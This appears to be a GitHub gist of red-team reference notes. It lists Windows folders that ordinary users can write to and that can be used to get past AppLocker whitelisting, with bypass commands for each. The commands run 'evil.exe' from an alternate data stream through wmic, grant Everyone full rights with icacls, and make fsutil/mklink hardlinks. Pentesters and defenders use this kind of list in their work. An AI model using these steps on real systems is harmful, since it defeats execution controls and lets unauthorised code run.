api0cradle/AppLocker-Bypass-Folderperms-CCM.md

## AppLocker-Bypass-Folderperms-CCM.md

      
    Raw
  

              AppLocker-Bypass-Folderperms-CCM.md
            
          
    c:\Windows\ccm\inventory\noidmifs

c:\Windows\ccm\logs

c:\Windows\ccm\systemtemp\appvtempdata\appvcommandoutput

  
## AppLocker-Bypass-Folderperms-W10v1803.md

      
    Raw
  

              AppLocker-Bypass-Folderperms-W10v1803.md
            
          
    Create folder - Add ADS stream and execute == mkdir a folder in the path, do type evil.exe > newfolderinpath:evil.exe and wmic process call create 'newfolderinpath:evil.exe'
Take ownership - Add all rights - Drop and execute == Take ownership of folder, add all NTFS rights to your current user (icacls  /grant:r Everyone:(OI)(CI)F /T) and then place binary file inside folder and execute.
Hardlink fsutil/mklink == Place evil.exe in user controlled folder (c:\myfolder) where you have execute rights. Do: fsutil hardlink create Folder\run.exe c:\myfolder\evil.exe. Execute run.exe. mklink /H folder\run.exe c:\myfolder\evil.exe works also...
Drop and execute == Just copy the binary into the folder and execute it.


Folder
Bypass
Access


C:\Windows\Tasks
Drop and execute
RW


C:\Windows\Temp
Drop and execute
RW


C:\Windows\tracing
Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute
RW


C:\Windows\Registration\CRMLog
Hardlink fsutil/mklink
RW


C:\Windows\System32\FxsTmp
Hardlink fsutil/mklink
RW


C:\Windows\System32\com\dmp
Hardlink fsutil/mklink
W


C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
Drop and execute
RW


C:\Windows\System32\spool\PRINTERS
Hardlink fsutil/mklink
W


C:\Windows\System32\spool\SERVERS
Hardlink fsutil/mklink
W


C:\Windows\System32\spool\drivers\color
Drop and execute
RW


C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute
RW


C:\Windows\SysWOW64\FxsTmp
Hardlink fsutil/mklink
RW


C:\Windows\SysWOW64\com\dmp
Hardlink fsutil/mklink
W


C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute
RW


C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
Drop and execute
RW
Folder	Bypass	Access
C:\Windows\Tasks	Drop and execute	RW
C:\Windows\Temp	Drop and execute	RW
C:\Windows\tracing	Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute	RW
C:\Windows\Registration\CRMLog	Hardlink fsutil/mklink	RW
C:\Windows\System32\FxsTmp	Hardlink fsutil/mklink	RW
C:\Windows\System32\com\dmp	Hardlink fsutil/mklink	W
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys	Drop and execute	RW
C:\Windows\System32\spool\PRINTERS	Hardlink fsutil/mklink	W
C:\Windows\System32\spool\SERVERS	Hardlink fsutil/mklink	W
C:\Windows\System32\spool\drivers\color	Drop and execute	RW
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter	Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute	RW
C:\Windows\SysWOW64\FxsTmp	Hardlink fsutil/mklink	RW
C:\Windows\SysWOW64\com\dmp	Hardlink fsutil/mklink	W
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter	Create folder - Add ADS stream and execute OR Create new folder - Take ownership - Add all rights - Drop and execute	RW
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System	Drop and execute	RW